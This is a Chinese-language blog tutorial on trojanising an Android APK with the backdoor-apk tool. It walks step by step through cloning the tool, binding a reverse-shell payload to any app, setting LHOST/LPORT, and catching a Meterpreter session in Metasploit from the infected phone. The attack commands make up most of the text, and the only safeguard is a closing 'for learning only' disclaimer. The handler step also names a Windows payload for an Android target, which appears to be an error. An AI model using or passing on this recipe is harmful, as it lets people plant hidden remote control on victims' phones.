Hello,朋友們大家好,歡迎來到LIUSE網絡。
對於滲透測試來講,一個成功的Backdoor(後門)是非常有價值的!那麼今天Liuse就帶領大家一起來學習
基於安卓apk的後門製作。對於不知道什麼是“後門”的同學,請去牆角面壁思過三分鐘。什麼是後門:後門程序就是留在計算機系統中,供某位特殊使用者通過某種特殊方式控制計算機系統的途徑。等於你買了開發商一套房子,開發商在你家後院挖了一條秘密通道,可以隨時進出。
在常規情況下,如果我們要想將一個正常無毒的apk文件嵌入進去惡意代碼、或者嵌入惡意payload的話那務必要我們動手先去反編譯apk文件,找到文件執行入口,並在activety中添加啟動PAYLOAD。這對於入門小白來講是十分的費勁!如此說來,是不是就要涼涼了?NONONONO,接下來鄙人給大家介紹一款神器backdoor-apk!
backdoor-apk 從名字上我們就能猜到用途了,沒錯就是用來製作 APK 後門的。這個工具,非常簡單易用,比手動去找關鍵點速度多了,完全傻瓜式操作!
首先,讓我們對它進行安裝,在安裝前我們需要先安裝它的一些依賴 lib 庫文件:
注:這裡推薦使用kali系統,後面要用到metasploit,如果你閒麻煩就用kali最方便,你要喜歡折騰用其它的也可以
apt-get install lib32stdc++6 lib32ncurses5 lib32z1 #安裝lib依賴
這裡詢問我們,對這些安裝的服務,當他們更新時不再進行詢問。我們選擇 Yes 即可!
在完成以上依賴庫的安裝後接著我們就可以安裝 backdoor-apk 啦!
git clone https://github.com/dana-at-cp/backdoor-apk.git #從github下載程序源碼
下載完成後我們進入到其文件目錄下:
cd backdoor-apk/
cd backdoor-apk/
在當前目錄下,我們可以看到一個腳本文件。這裡,我們需要提前準備一個用來綁定後門的 APK 文件(這個文件是什麼都可以,可以是企鵝、可以是K歌隨你來)。
./backdoor-apk.sh /root/secist.apk #啟動backdoor
選擇 3 payload #選擇攻擊載荷
LHOST:192.168.15.131 #設置IP
LPORT:4444 #設置端口
成功執行以上操作後,會生成一個綁定後門的 secist.apk 文件,默認被保存在 backdoor-apk>>original>>dist 目錄下!下面我們來啟動偵聽:
在kali打開metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
同時,我將生成的帶有後門的 APK 發送至我的手機,並進行安裝打開!
如果沒有出錯的話,現在你的軟件是可以正常使用的,只不過,在後臺你植入的backdoor也已經運行起來了,並返回給指定地址一個shell。
打開軟件後,很快的我們的kali下也會有提示並返回一個meterperter,這說明我們已經獲取到shell了!
簡單輸入一個,查看系統信息的命令:
sysinfo
可以看到目標系統為 安卓6 版本,內核為 linux 3.10.49 架構為 armv7l 。
注:文章有一定攻擊性,旨在學習網絡安全。請大家在虛擬環境下測試,切勿用於違法犯罪!維護網絡安全,是你我共同的責任!
——以上部分素材來自“即刻安全”。
閱讀更多 LIUSE網絡 的文章
